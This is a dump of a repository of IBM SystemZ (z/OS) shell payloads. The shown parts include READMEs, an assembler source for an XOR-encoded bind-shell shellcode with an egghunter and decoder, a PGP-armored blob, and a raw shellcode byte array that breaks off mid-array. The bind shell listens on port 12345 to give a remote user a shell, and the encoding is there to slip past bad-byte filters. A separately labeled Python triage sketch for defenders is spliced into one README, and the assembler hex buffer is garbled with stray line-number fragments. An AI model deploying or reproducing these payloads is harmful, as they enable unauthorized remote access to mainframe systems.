├── README.md
├── bind-shell
    ├── README.md
    ├── sb_shellcode.s
    ├── sb_shellcode.s.asc
    ├── sb_shellcode.txt
    ├── sb_shellcode.txt.asc
    ├── shell_bind.s
    └── shell_bind.s.asc
├── local-exec-shell
    └── local_shell.s
├── operexp
    ├── Makefile
    └── src
    │   └── racr.s
└── reverse-shell
    ├── reverse-shell-noenc.s
    ├── reverse-shell-noenc.s.asc
    └── sr_shellcode.txt

/README.md:
--------------------------------------------------------------------------------
# shells-payloads
Source code for SystemZ Shells / Payloads

**local-exec-shell** - Code used to launch a local shell via the exec USS callable service.

**bind-shell** - Code used to launch a bind shell which can be connected to remotely (from Windows, Linux, etc., with Netcat, for instance) to gain a local shell.

--------------------------------------------------------------------------------
/bind-shell/README.md:
--------------------------------------------------------------------------------
### shell_bind.s
*Will open a bind socket on port 12345, address 0.0.0.0, on SystemZ.*
### sb_shellcode.txt
*Slimmed-down shellcode version of the above that is XOR encoded to remove nulls and EBCDIC newlines. Built-in decoder bytes at the beginning decode the payload and jump to it.*
### sb_shellcode.s
*Source code for the above shellcode. The code uses an egghunter to find the beginning of the encoded data, XOR-decodes the payload, then jumps to it and executes it. Built-in EBCDIC to ASCII conversion allows for connections from Windows or 'Nix systems.*
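
A defender-side triage sketch for the layout this README describes, added here and not part of the repository: it locates the doubled `DEADBEEF` egg, recovers a single-byte XOR key by searching for an EBCDIC `/bin/sh`, and lists the EBCDIC strings in the decoded data. The function names and the sample buffer are constructed for illustration, and Python's `cp037` codec and the `0x15` newline value are assumptions standing in for the z/OS code page.

```python
"""Static triage of a buffer that follows the sb_shellcode layout.

Added example: not code from the shells-payloads repository.
"""

EGG = bytes.fromhex("deadbeef")   # egg value stated in sb_shellcode.s
NEEDLES = ("/bin/sh",)            # shell path named in shell_bind.s comments
EBCDIC_NL = 0x15                  # assumption: the "EBCDIC newline" the README means


def find_payload(buf, egg=EGG):
    """Return the offset of the first byte after the doubled egg, or -1.

    A lone egg also occurs inside the decoder stub (the LGFI immediate),
    so only two eggs back to back mark the start of the encoded data.
    """
    marker = egg + egg
    idx = buf.find(marker)
    return -1 if idx < 0 else idx + len(marker)


def xor_decode(data, key):
    """XOR every byte with a single-byte key."""
    return bytes(b ^ key for b in data)


def recover_keys(encoded, needles=NEEDLES):
    """Single-byte keys under which an EBCDIC needle appears in the data."""
    targets = [n.encode("cp037") for n in needles]
    return [k for k in range(1, 256)
            if any(t in xor_decode(encoded, k) for t in targets)]


def ebcdic_strings(data, min_len=4):
    """Runs of printable characters after decoding the bytes as cp037."""
    found, run = [], []
    for ch in data.decode("cp037", errors="replace"):
        if ch.isascii() and ch.isprintable():
            run.append(ch)
            continue
        if len(run) >= min_len:
            found.append("".join(run))
        run = []
    if len(run) >= min_len:
        found.append("".join(run))
    return found


def triage(buf):
    """Summarise a suspect buffer; None when no doubled egg is present."""
    start = find_payload(buf)
    if start < 0:
        return None
    encoded = buf[start:]
    report = {
        "payload_offset": start,
        # The README says encoding removes nulls and EBCDIC newlines.
        "null_and_nl_free": 0x00 not in encoded and EBCDIC_NL not in encoded,
        "candidates": [],
    }
    for key in recover_keys(encoded):
        strings = ebcdic_strings(xor_decode(encoded, key))
        report["candidates"].append({"key": key, "strings": strings})
    return report


# Constructed sample, not a working payload: 8 bytes standing in for the
# stub (they contain one lone egg), the doubled egg, then a length byte,
# an EBCDIC "/bin/sh" and zero padding, XORed with the key 0x2a that
# sb_shellcode.s lists as its "Enc buffer char".
_PLAIN = bytes([7]) + "/bin/sh".encode("cp037") + bytes(4)
SAMPLE = bytes.fromhex("c0a1deadbeef18bc") + EGG + EGG + xor_decode(_PLAIN, 0x2A)

if __name__ == "__main__":
    print(triage(SAMPLE))
```
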

--------------------------------------------------------------------------------
/bind-shell/sb_shellcode.s:
--------------------------------------------------------------------------------
         TITLE 'sb_shellcode.s                                         x
               Author: Bigendian Smalls'
         ACONTROL AFPR
SBSHELL  CSECT
SBSHELL  AMODE 31
SBSHELL  RMODE ANY
         SYSSTATE ARCHLVL=2
         ENTRY MAIN
MAIN     DS    0F
** Begin setup and stack management **
         STM   6,4,12(13)     # store all the registers in old SP area
         LARL  15,*-4         # put base addr into R15
         LR    12,15          # put given base addr into R12
         XR    1,1            # zero out R1 for counting
         XR    2,2            # zero out R2 for counting
         XR    3,3            # zero out R3
         AFI   1,X'01010102'  # loading a 1 in R1
         AFI   2,X'01010103'  # loading a 1 in R1
         XR    1,2            # loading a 1 in R1
         LR    4,1            # will put a 4 in R4
         SLA   4,1(1)         # make R4 == 4
         XR    10,10          # zero out R10 for our egg
         XR    2,2            # zero 2
         LGFI  10,X'deadbeef' # load egghunter value into R10
         LR    11,12          # load base into R11
LOOPER   AR    11,1           # add 1 to R11
         L     3,1(2,11)      # retrieve value at R11 +1 indexR2=0
         CR    10,3           # compare egg with R11 mem pointer
         BRC   7,LOOPER       # branch anything but equal
         AR    11,4
         L     3,1(2,11)      # retrieve value at R11 +1 indexR2=0
         CR    10,3           # compare egg with R11 mem pointer
         BRC   7,LOOPER       # 2nd check 2 in a row good to go!
         AR    11,1           # 1 for the offset from above
         SR    11,4           # 4 to skip last egg
         ST    13,4(,11)      # store old SP for later in wkg area
         ST    11,8(,13)      # store this in old wking area
         LR    13,11          # set up R13 pt to new wkg area
** End setup and stack management **
** Begin main decoding routine **
         LR    3,11           # This is now our egghunter loc
         AR    3,4            # add 4 to 3
         AR    3,4            # R3 points to SC for decoding
         LR    5,3            # R5 points to SC for jumping to
         SR    3,1            # R3-1 so we can XI that addr w/o nulls
         SR    3,1            # R3-1 so we can XI that addr w/o nulls
         LR    4,1            # R4 has static 1
         XR    1,1            # R1 will be our byte counter
         XR    2,2            # R2 will be address pointer
LOOP1    AR    1,4            # add 1 to R1 byte counter
         ARK   2,3,1          # generate new address pointer
* put the XOR key (enc buffer char) from below in the quotes below
         XI    1(2),X'2a'     # xor byte with key
* put the buffer len (num of bytes) in the next cmd in CHI 1,
         CHI   1,1664         # to yield sc len
         BRC   4,LOOP1        # loop bwd 18 bytes if R1 < size
         XR    4,4
** Begin cleanup and stack management **
         L     13,4(4,11)     # reload old SP
         LM    6,4,12(13)     # restore registers
         BCR   15,5           # jmp to sc
** End main decoding routine **
         DC    X'DEADBEEF'    #egg
         DC    X'DEADBEEF'    #egg + old sp
*******************************************************************
*Buffer length: 3328
*Number of bytes: 1664
*Padding bytes: 0
*Enc buffer char: 0x2a
*ASM buffer:
2853ee55d5d5d59eea5a2a2a285fee55d5d5d59aea5a2a2a28adee55X 80 | d5d5d5868d122a2c8d722a228dcfd59d' 81 | DC X'eed72a2a28478dcfd5baea5a2a2a285cee55d5d5d5b9ea5a2a2a28X 82 | 58ee55d5d5d5a5ea5a2a2a2886ee55d5d5d5a18d122a2e8d722a2c8dX 83 | cfd5b032d6ee47d5d5d5a9c64d28062a54eed72a2a2861ea5a2a2a28X 84 | 7eee55d5d5d55bea5a2a2a281cee55d5d5d5478d122a298d722a2f8dX 85 | cfd554eed72a2a28128dcfd57dea5a2a' 86 | DC X'2a2817ee55d5d5d570ea5a2a2a2869ee55d5d5d57cea5a2a2a281fX 87 | ee55d5d5d578ea5a2a2a2813ee55d5d5d5648d122a2f8d722a2c8dcfX 88 | d5718dcf2b5cee752a2a287dee452a2a287c8dcf2b44ee752a2a2879X 89 | ee452a2a2878eed72a2a2bd18dcfd50e8d122a2b8d722a298dcfd56aX 90 | ee07d5d5d50ec60d2a522a546b0a2a23' 91 | DC X'ee772a2a2816324f8dcf2b0eee772a2a281a324f8dcf2b346b0a2aX 92 | 22ee772a2a2806ea4b2a2a2a2a8dcf2b3eee772a2a2808ea4b2a2a2aX 93 | 2b8dcf2b26ee772a2a2830ea4b2a2a2a288dcf2b2e6b0a2a23ee772aX 94 | 2a2838324f8dcf2ad6ee772a2a2820324f8dcf2adceed72a2a2b9c8dX 95 | cfd4f7ea5a2a2a2bf9ee55d5d5d4ca30' 96 | DC X'56ee55d5d5d4f4ea5a2a2a2be5ee55d5d5d4f03056ee552a2a2be6X 97 | 3056ee55d5d5d4fe3056ee552a2a2be23056ee55d5d5d4e4ea5a2a2aX 98 | 2ba3ee55d5d5d4e0ee55d5d5d4e3ee55d5d5d4e2ee55d5d5d4edee55X 99 | d5d5d4ec8d122a218d722a278dcfd4ed8d2f2b766b0a2a23ee772a2aX 100 | 2bef324f8dcf2a85ee772a2a2b97324f' 101 | DC X'8dcf2a836b0a2a2eee772a2a2bad8d422a2d8dcf2a8aee772a2a2bX 102 | 868d422a2c8dcf2ab3ea7a2a2a2b53eaaa2a2a2a268dcf2a318dcf2aX 103 | caea7a2a2a2b8b8dcf2a70ea7a2a2a2bbceaaad5d5d5c48dcf2a268dX 104 | cf2ad4eacad5d5d5dcea7a2a2a2b778dde2a62eed72a2a2b6832948dX 105 | cfd474ea0a2a2a2b58fd290a2a0a2aea' 106 | DC X'0a2a2a2b4efd250a2a0a2aee75d5d5d472ea5a2a2a2b71ee552a2aX 107 | 2b7eea5a2a2a2b7bee55d5d5d464ea5a2a2a2b25ee55d5d5d460ea5aX 108 | 2a2a2b6dee55d5d5d46cea5a2a2a2b61ee55d5d5d4688d122a2c8d72X 109 | 2a2d8dcfd46732c132d3ee472a2a2b17c648ca2a2ad4c642aa2ad5d4X 110 | 8d2f2af2eed72a2a2ad432948dcfd432' 111 | DC X'ee75d5d5d434ea5a2a2a2b0bee552a2a2b30ea5a2a2a2b3dee55d5X 112 | 
d5d43eea5a2a2a2affee55d5d5d43aea5a2a2a2b3dee55d5d5d4268dX 113 | 122a2f8d722a2d8dcfd43332c1ee47d5d5d42e32dcc6422a80d5542dX 114 | d4eed72a2a2afa32948dcfd7c2ee752a2a2ad4ee052a2a2ad7ee452aX 115 | 2a2ad6ea5a2a2a2adfee55d5d5d7c830' 116 | DC X'56ee55d5d5d7ca3056ee55d5d5d7f48d122a2e8d722a2c8dcfd7c7X 117 | 32c1ee57d5d5d7fcc6522a55d5542dd4eed72a2a2a8d32948dcfd797X 118 | ea5a2a2a2af3ee55d5d5d7ea3056ee55d5d5d7948d122a298d722a2fX 119 | 8dcfd7e5ee47d5d5d79d8dd22a49c6422a4ad554ee772a2a2aebee47X 120 | 2a2a2aea32c12dd4ea3a2a2a2a83ee67' 121 | DC X'2a2a2a848da22a3fea0a2a2a2aeb3d4cc91a3a2a2a5cea112a2a2aX 122 | d533128d5e2a228d722aaf687a3a2a8dde2a25c97a0a2a2a5cea712aX 123 | 2a2ad530433003331f8d5ed5dd684a3a2a303331638d5ed5f42dd4eeX 124 | 672a2a2aaeea3a2a2a2a538da22aafea0a2a2a2abe3103c91a3a2a2aX 125 | 5cea112a2a2ad533128d5e2a2c8d122a' 126 | DC X'4f8dde2a233009c91a0a2a2a5cea112a2a2ad5681a3a2a30333163X 127 | 8d5ed5ce2dd43dd5ea6a2a2a2a3a7ada6a2a72fa6a2eb2c6fa26ea6aX 128 | 2a2a2a2d72da6a2a2dd42a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2bX 129 | 2a2a2a282b7919962b79198e2b791d3a2b791c1c2b791c422b791c0eX 130 | 2b7919342b7919a02b7918662b79192c' 131 | DC X'2a2a2a2a2a2a2a3a2a2a2a2a2a2a2a2a3a282a2a2a2a2a2a2a2a2aX 132 | 2a2a2a2a2a2a2a2a2d4ba8a3bf4b88a22a2a2a2a2b2a2a2a282a2a2aX 133 | 2a88a22a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a3a08080808080808X 134 | 0808080808080808082a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2aX 135 | 2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a2a' 136 | DC X'2a2a2a2a2a28281a132a2a2a2a' 137 | E2ABU DC X'0102039c09867f978d8e0b0c0d0e0f101112139d0a08871819928fX 138 | 1c1d1e1f808182838485171b88898a8b8c0506079091169394959604X 139 | 98999a9b14FF9e1a20a0e2e4e0e1e3e5e7f1a22e3c282b7c26e9eaebX 140 | e8edeeefecdf21242a293b5e2d2fc2c4c0c1c3c5c7d1a62c255f3e3fX 141 | f8c9cacbc8cdcecfcc603a2340273d22' 142 | DC X'd8616263646566676869abbbf0fdfeb1b06a6b6c6d6e6f707172aaX 143 | bae6b8c6a4b57e737475767778797aa1bfd05bdeaeaca3a5b7a9a7b6X 144 | bcbdbedda8af5db4d77b414243444546474849adf4f6f2f3f57d4a4bX 145 | 
4c4d4e4f505152b9fbfcf9faff5cf7535455565758595ab2d4d6d2d3X 146 | d530313233343536373839b3dbdcd9da' 147 | DC X'9f' 148 | ****************************************************************** 149 | DC X'8BADF00D' eof marker 150 | END 151 | -------------------------------------------------------------------------------- /bind-shell/sb_shellcode.s.asc: -------------------------------------------------------------------------------- 1 | -----BEGIN PGP MESSAGE----- 2 | Comment: GPGTools - https://gpgtools.org 3 | 4 | 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 58 | NEQ01iiORJjEMJhEFimkkUEWJRhhwDamsUHgcQQ3I0AIicrlDgBisIWDjSIcuRGd 59 | RRyHGKIfxZGEQUojjgQKYxRjLGIasxhu/6jcmOMojmMZK8x27owtlgQUwwjrxlsM 60 | Yy23YQKL0Nd0ilgNpwPu2rYMaxu5adcmVpuEYOLORkwVHHLo/JpophFgmmquQ4Nh 61 | ENOEcyj5tOxaEulYS610pGGG0665IMAlZYiEFAr6kAwYuG4LIqhgggshQgE3WamU 62 | SlACPVFhhYQUSmgB3VIkIQoxFLZy7pWE61CkBVyTeGhDGrKQhyKE6RFal5RYJQZx 63 | BVdrN2VSyVUoYxmq8pVDaWWUNQbORMKNYiYMFcOMwCTDGFwkYb6MWAz9miUiIQlN 64 | oJMy0FoSxDRzV5KEI445TPWJSnQSJzDEcJ2EnHLGORc85BGPuVRwDo0wMKMN6y2I 65 | AjChSjLKqaAh3Opi6E7KaBObYbCO4frwDvzJsyQ3mqxM70Ro2v2N1TaToC5bK/7/ 66 | AMzsnR65dfMnzty0eWTTWVvetf/4jqc3jbz7AwePvXLXRec0LvxqdPabl9yy/tr1 67 | J56bWycvH/5156VNZ72449iJ2+Ir7/7PH+594bznPr/r1ZXrxpo3n9F46MF/vPrI 68 | lmNX6eiTS1vufLS2svb7nx659UNP/ORhfic/97sn2o8ev//cH9x85vOvjc3+bOGb 69 | Lz/95zuqT7707FeuOPT6v7Y//Pj5V//loeufPXjz7ZVrTrxx9+SJFz7+xq8e3/+j 70 | +3nj3//9+/kXfPgCJJ55/NrPvbSldsu9bxy55O7z4n0f3bv9keT2qP7aR17/xVN3 71 | fepLv1m54543r10/dsn2e77+x/vWv3POlxtbHnjkrz+35ux/HvreL817v/HDM2+/ 72 | 7cHx95z1t3sfezR67k9bf4e/f8Mzc9967NgFD3xt5DPP//bFV77wRO3JtfvkB49f 73 | fP2FV138sS8+9T8= 74 | =bIR5 75 | -----END PGP MESSAGE----- 76 | -------------------------------------------------------------------------------- /bind-shell/sb_shellcode.txt: -------------------------------------------------------------------------------- 1 | char sc[]= 2 | "\x90\x64\xd0\x0c\xc0\xf0\xff\xff\xff\xfe\x18\xcf\x17\x11\x17\x22" 3 | "\x17\x33\xc2\x19\x01\x01\x01\x02\xc2\x29\x01\x01\x01\x03\x17\x12" 4 | "\x18\x41\x8b\x40\x10\x01\x17\xaa\x17\x22\xc0\xa1\xde\xad\xbe\xef" 5 | "\x18\xbc\x1a\xb1\x58\x32\xb0\x01\x19\xa3\xa7\x74\xff\xfc\x1a\xb4" 6 | 
"\x58\x32\xb0\x01\x19\xa3\xa7\x74\xff\xf6\x1a\xb1\x1b\xb4\x50\xd0" 7 | "\xb0\x04\x50\xb0\xd0\x08\x18\xdb\x18\x3b\x1a\x34\x1a\x34\x18\x53" 8 | "\x1b\x31\x1b\x31\x18\x41\x17\x11\x17\x22\x1a\x14\xb9\xf8\x10\x23" 9 | "\x97\x2a\x20\x01\xa7\x1e\x06\x80\xa7\x44\xff\xf9\x17\x44\x58\xd4" 10 | "\xb0\x04\x98\x64\xd0\x0c\x07\xf5\xde\xad\xbe\xef\xde\xad\xbe\xef" 11 | "\xba\xc6\xfa\x26\xea\xda\xd5\xd5\xd5\xd4\x32\x25\xea\x6a\x2a\x2a" 12 | "\x28\xfc\x7a\xfa\x6a\x2e\x32\xfe\x8d\xb2\x2a\x2b\x8d\xe2\x2a\x2e" 13 | "\x8d\xde\x2a\x6c\xea\x1a\x2a\x2a\x2a\x22\xfd\x19\x1a\x2a\x1a\x2a" 14 | "\x3d\x19\x2d\xd4\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a" 15 | "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a" 16 | "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a" 17 | "\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\xea\x3a\xd5\xd5\xd5\xcc\xee\xc5" 18 | "\x2a\x2a\x28\x8f\xc6\x12\x2a\x3d\x2a\x54\x31\x13\x31\x73\x8d\x16" 19 | "\x2a\x2e\x8d\x76\x2a\x2e\x30\x1b\x30\x7b\xc6\x1f\x2a\x22\xaa\x5c" 20 | "\x7a\x1a\x1a\x2a\x30\x16\x8d\xde\xd5\xd0\x8f\x70\xaa\x2a\x7a\x7a" 21 | "\x7a\x2a\x2f\xc5\xee\xc7\x2a\x2a\x28\xa0\x2d\xd4\xee\xd7\x2a\x2a" 22 | "\x28\xbe\x8d\xcf\xd5\x93\xea\x5a\x2a\x2a\x28\xa3\xee\x55\xd5\xd5" 23 | "\xd5\x96\xea\x5a\x2a\x2a\x28\xab\xee\x55\xd5\xd5\xd5\x92\xea\x5a" 24 | "\x2a\x2a\x28\x53\xee\x55\xd5\xd5\xd5\x9e\xea\x5a\x2a\x2a\x28\x5f" 25 | "\xee\x55\xd5\xd5\xd5\x9a\xea\x5a\x2a\x2a\x28\xad\xee\x55\xd5\xd5" 26 | "\xd5\x86\x8d\x12\x2a\x2c\x8d\x72\x2a\x22\x8d\xcf\xd5\x9d\xee\xd7" 27 | "\x2a\x2a\x28\x47\x8d\xcf\xd5\xba\xea\x5a\x2a\x2a\x28\x5c\xee\x55" 28 | "\xd5\xd5\xd5\xb9\xea\x5a\x2a\x2a\x28\x58\xee\x55\xd5\xd5\xd5\xa5" 29 | "\xea\x5a\x2a\x2a\x28\x86\xee\x55\xd5\xd5\xd5\xa1\x8d\x12\x2a\x2e" 30 | "\x8d\x72\x2a\x2c\x8d\xcf\xd5\xb0\x32\xd6\xee\x47\xd5\xd5\xd5\xa9" 31 | "\xc6\x4d\x28\x06\x2a\x54\xee\xd7\x2a\x2a\x28\x61\xea\x5a\x2a\x2a" 32 | "\x28\x7e\xee\x55\xd5\xd5\xd5\x5b\xea\x5a\x2a\x2a\x28\x1c\xee\x55" 33 | 
"\xd5\xd5\xd5\x47\x8d\x12\x2a\x29\x8d\x72\x2a\x2f\x8d\xcf\xd5\x54" 34 | "\xee\xd7\x2a\x2a\x28\x12\x8d\xcf\xd5\x7d\xea\x5a\x2a\x2a\x28\x17" 35 | "\xee\x55\xd5\xd5\xd5\x70\xea\x5a\x2a\x2a\x28\x69\xee\x55\xd5\xd5" 36 | "\xd5\x7c\xea\x5a\x2a\x2a\x28\x1f\xee\x55\xd5\xd5\xd5\x78\xea\x5a" 37 | "\x2a\x2a\x28\x13\xee\x55\xd5\xd5\xd5\x64\x8d\x12\x2a\x2f\x8d\x72" 38 | "\x2a\x2c\x8d\xcf\xd5\x71\x8d\xcf\x2b\x5c\xee\x75\x2a\x2a\x28\x7d" 39 | "\xee\x45\x2a\x2a\x28\x7c\x8d\xcf\x2b\x44\xee\x75\x2a\x2a\x28\x79" 40 | "\xee\x45\x2a\x2a\x28\x78\xee\xd7\x2a\x2a\x2b\xd1\x8d\xcf\xd5\x0e" 41 | "\x8d\x12\x2a\x2b\x8d\x72\x2a\x29\x8d\xcf\xd5\x6a\xee\x07\xd5\xd5" 42 | "\xd5\x0e\xc6\x0d\x2a\x52\x2a\x54\x6b\x0a\x2a\x23\xee\x77\x2a\x2a" 43 | "\x28\x16\x32\x4f\x8d\xcf\x2b\x0e\xee\x77\x2a\x2a\x28\x1a\x32\x4f" 44 | "\x8d\xcf\x2b\x34\x6b\x0a\x2a\x22\xee\x77\x2a\x2a\x28\x06\xea\x4b" 45 | "\x2a\x2a\x2a\x2a\x8d\xcf\x2b\x3e\xee\x77\x2a\x2a\x28\x08\xea\x4b" 46 | "\x2a\x2a\x2a\x2b\x8d\xcf\x2b\x26\xee\x77\x2a\x2a\x28\x30\xea\x4b" 47 | "\x2a\x2a\x2a\x28\x8d\xcf\x2b\x2e\x6b\x0a\x2a\x23\xee\x77\x2a\x2a" 48 | "\x28\x38\x32\x4f\x8d\xcf\x2a\xd6\xee\x77\x2a\x2a\x28\x20\x32\x4f" 49 | "\x8d\xcf\x2a\xdc\xee\xd7\x2a\x2a\x2b\x9c\x8d\xcf\xd4\xf7\xea\x5a" 50 | "\x2a\x2a\x2b\xf9\xee\x55\xd5\xd5\xd4\xca\x30\x56\xee\x55\xd5\xd5" 51 | "\xd4\xf4\xea\x5a\x2a\x2a\x2b\xe5\xee\x55\xd5\xd5\xd4\xf0\x30\x56" 52 | "\xee\x55\x2a\x2a\x2b\xe6\x30\x56\xee\x55\xd5\xd5\xd4\xfe\x30\x56" 53 | "\xee\x55\x2a\x2a\x2b\xe2\x30\x56\xee\x55\xd5\xd5\xd4\xe4\xea\x5a" 54 | "\x2a\x2a\x2b\xa3\xee\x55\xd5\xd5\xd4\xe0\xee\x55\xd5\xd5\xd4\xe3" 55 | "\xee\x55\xd5\xd5\xd4\xe2\xee\x55\xd5\xd5\xd4\xed\xee\x55\xd5\xd5" 56 | "\xd4\xec\x8d\x12\x2a\x21\x8d\x72\x2a\x27\x8d\xcf\xd4\xed\x8d\x2f" 57 | "\x2b\x76\x6b\x0a\x2a\x23\xee\x77\x2a\x2a\x2b\xef\x32\x4f\x8d\xcf" 58 | "\x2a\x85\xee\x77\x2a\x2a\x2b\x97\x32\x4f\x8d\xcf\x2a\x83\x6b\x0a" 59 | "\x2a\x2e\xee\x77\x2a\x2a\x2b\xad\x8d\x42\x2a\x2d\x8d\xcf\x2a\x8a" 60 | 
